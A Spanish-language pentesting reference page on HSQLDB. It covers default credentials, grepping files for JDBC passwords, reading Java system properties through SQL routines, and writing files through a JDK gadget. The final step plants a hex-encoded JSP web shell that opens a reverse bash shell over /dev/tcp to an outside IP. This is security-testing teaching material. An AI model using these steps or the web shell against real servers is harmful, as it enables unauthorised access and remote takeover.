{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}


# Información Básica

**HSQLDB \([HyperSQL DataBase](http://hsqldb.org/)\)** es el sistema de base de datos relacional SQL líder escrito en Java. Ofrece un motor de base de datos pequeño, rápido, multihilo y transaccional con tablas en memoria y basadas en disco, y soporta modos embebidos y de servidor.

**Puerto por defecto:** 9001
```text
9001/tcp open  jdbc      HSQLDB JDBC (Network Compatibility Version 2.3.4.0)
```
# Información

### Configuraciones Predeterminadas

Ten en cuenta que por defecto este servicio probablemente esté ejecutándose en memoria o esté vinculado a localhost. Si lo encontraste, probablemente explotaste otro servicio y estás buscando escalar privilegios.

Las credenciales predeterminadas suelen ser `sa` con una contraseña en blanco.

Si has explotado otro servicio, busca posibles credenciales usando
```text
grep -rP 'jdbc:hsqldb.*password.*' /path/to/search
```
Note el nombre de la base de datos cuidadosamente - lo necesitará para conectarse.

# Info Gathering

Conéctese a la instancia de la base de datos descargando [HSQLDB](https://sourceforge.net/projects/hsqldb/files/) y extrayendo `hsqldb/lib/hsqldb.jar`. Ejecute la aplicación GUI \(eww\) usando `java -jar hsqldb.jar` y conéctese a la instancia utilizando las credenciales descubiertas/débiles.

Tenga en cuenta que la URL de conexión se verá algo así para un sistema remoto: `jdbc:hsqldb:hsql://ip/DBNAME`.

# Tricks

## Java Language Routines

Podemos llamar a métodos estáticos de una clase de Java desde HSQLDB usando Java Language Routines. Tenga en cuenta que la clase llamada necesita estar en el classpath de la aplicación.

JRTs pueden ser `functions` o `procedures`. Las funciones pueden ser llamadas a través de declaraciones SQL si el método de Java devuelve una o más variables primitivas compatibles con SQL. Se invocan usando la declaración `VALUES`.

Si el método de Java que queremos llamar devuelve void, necesitamos usar un procedimiento invocado con la declaración `CALL`.

## Reading Java System Properties

Crear función:
```text
CREATE FUNCTION getsystemproperty(IN key VARCHAR) RETURNS VARCHAR LANGUAGE JAVA
DETERMINISTIC NO SQL
EXTERNAL NAME 'CLASSPATH:java.lang.System.getProperty'
```
Ejecutar función:
```text
VALUES(getsystemproperty('user.name'))
```
Puedes encontrar una [lista de propiedades del sistema aquí](https://docs.oracle.com/javase/tutorial/essential/environment/sysprop.html).

## Escribir contenido en un archivo

Puedes usar el `com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename` gadget de Java ubicado en el JDK \(cargado automáticamente en el class path de la aplicación\) para escribir elementos codificados en hex en el disco a través de un procedimiento personalizado. **Nota el tamaño máximo de 1024 bytes**.

Crear procedimiento:
```text
CREATE PROCEDURE writetofile(IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(1024))
LANGUAGE JAVA DETERMINISTIC NO SQL EXTERNAL NAME
'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename'
```
Ejecutar procedimiento:
```text
call writetofile('/path/ROOT/shell.jsp', cast ('3c2540207061676520696d706f72743d226a6176612e696f2e2a2220253e0a3c250a202020537472696e6720636d64203d20222f62696e2f62617368202d69203e26202f6465762f7463702f3139322e3136382e3131392[...]' AS VARBINARY(1024)))
```
{% hint style="success" %}
Aprende y practica Hacking en AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Aprende y practica Hacking en GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Apoya a HackTricks</summary>

* Revisa los [**planes de suscripción**](https://github.com/sponsors/carlospolop)!
* **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **síguenos** en **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Comparte trucos de hacking enviando PRs a los** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositorios de github.

</details>
{% endhint %}